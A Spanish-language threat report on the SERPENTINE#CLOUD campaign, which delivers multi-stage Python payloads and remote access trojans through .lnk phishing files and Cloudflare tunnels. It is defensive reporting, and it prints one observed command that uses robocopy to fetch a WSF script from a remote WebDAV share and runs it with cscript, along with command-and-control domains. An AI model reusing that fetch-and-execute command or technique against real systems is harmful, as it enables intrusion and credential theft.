Ha sido detectada una sofisticada campaña de malware, denominada SERPENTINE#CLOUD, que está utilizando la infraestructura de túneles de Cloudflare para distribuir cargas útiles de Python en múltiples etapas. Esto marca una preocupante evolución en las tácticas cibercriminales.
Esta campaña representa una escalada significativa en el abuso de servicios legítimos en la nube con fines maliciosos. Combina técnicas de ingeniería social con métodos avanzados de evasión para comprometer sistemas en diversas naciones occidentales.
Los actores de amenazas responsables de SERPENTINE#CLOUD han desarrollado una intrincada cadena de infección. Esta se inicia con correos electrónicos de phishing que contienen archivos de acceso directo maliciosos, disfrazados de documentos PDF. Estos correos electrónicos suelen simular ser comunicaciones relacionadas con facturas, aprovechando procesos comerciales habituales para engañar a las víctimas y lograr que ejecuten la carga útil inicial.
Los atacantes han demostrado una considerable sofisticación al aprovechar el servicio de túnel temporal de Cloudflare, específicamente el subdominio trycloudflare.com, para alojar y entregar sus cargas maliciosas mientras permanecen en el anonimato y evaden las medidas de seguridad de red tradicionales.
Los investigadores de Securonix identificaron la campaña mediante análisis de telemetría que revelaron un fuerte enfoque en objetivos en Estados Unidos, Reino Unido, Alemania y otras regiones de Europa y Asia.
Los actores de amenazas han demostrado fluidez en inglés según los comentarios de código y las prácticas de secuencias de comandos observadas en todo su conjunto de herramientas. La atribución sigue siendo incierta, aunque la estructura de la campaña y los patrones de focalización sugieren que un actor sofisticado está probando métodos de entrega escalables para un despliegue generalizado.
El impacto del malware va más allá del simple compromiso del sistema, ya que la carga útil final ofrece capacidades troyanos de acceso remoto que permiten a los atacantes robar credenciales, datos de sesión del navegador e información confidencial mientras mantienen un acceso persistente a los sistemas infectados.
El uso de la infraestructura confiable de Cloudflare permite que el tráfico malicioso se combine perfectamente con las comunicaciones legítimas, lo que hace que la detección sea significativamente más desafiante para las soluciones de seguridad tradicionales.
La campaña SERPENTINE#CLOUD emplea un proceso de infección de múltiples etapas notablemente complejo que muestra técnicas avanzadas diseñadas para evadir tanto el escrutinio de los usuarios como las soluciones de seguridad de terminales.
El vector de infección inicial se basa en archivos maliciosos de acceso directo de Windows con la extensión .lnk, diseñados para aparecer como documentos PDF legítimos a través de íconos personalizados y extensiones de archivo ocultas.
Cuando una víctima ejecuta el archivo de acceso directo disfrazado, activa una sofisticada secuencia de comandos que inicia la descarga y ejecución de etapas posteriores.
El archivo malicioso .lnk contiene un comando integrado que utiliza la utilidad robocopy nativa de Windows para recuperar cargas útiles de recursos compartidos WebDAV remotos alojados en los subdominios del túnel de Cloudflare.
Un comando típico observado en la campaña sigue este patrón: cmd.exe /c robocopy «\\flour-riding-merit-refers.trycloudflare[.]com@SSL\DavWWWRoot\RE_02WSF» %temp% tank.wsf /ns /nc /nfl /ndl >nul & start /min «» cscript.exe //nologo «%temp%\tank.wsf».
Este enfoque crea múltiples capas de indirección que complican los esfuerzos de análisis y atribución.
La siguiente etapa del archivo por lotes representa quizás el componente más sofisticado de la cadena de infección, ya que emplea múltiples capas de ofuscación, incluida la codificación UTF-16LE y técnicas dinámicas de sustitución de variables.
El script por lotes desofuscado realiza funciones críticas que incluyen la implementación de documentos PDF señuelo, la detección de software antivirus, la descarga de cargas útiles basadas en Python y el establecimiento de persistencia a través de modificaciones de la carpeta de inicio de Windows.
En última instancia, el script descarga y extrae archivos ZIP que contienen bibliotecas completas de Python y scripts maliciosos, lo que culmina en la ejecución de un cargador de shellcode basado en Python que implementa técnicas de inyección Early Bird APC para ejecutar cargas útiles residentes en la memoria sin escribir archivos en el disco.
La etapa final ofrece cargas útiles de PE empaquetadas en Donut que funcionan como troyanos de acceso remoto, estableciendo comunicación de comando y control con la infraestructura alojada en múltiples dominios, incluidos nhvncpure.shop, nhvncpure.sbs y varios servicios DNS dinámicos.
Toda la cadena de infección demuestra una notable sofisticación en el uso de herramientas legítimas, comunicaciones cifradas y ejecución sólo en memoria para evadir la detección y al mismo tiempo mantener el acceso a largo plazo a los sistemas comprometidos.
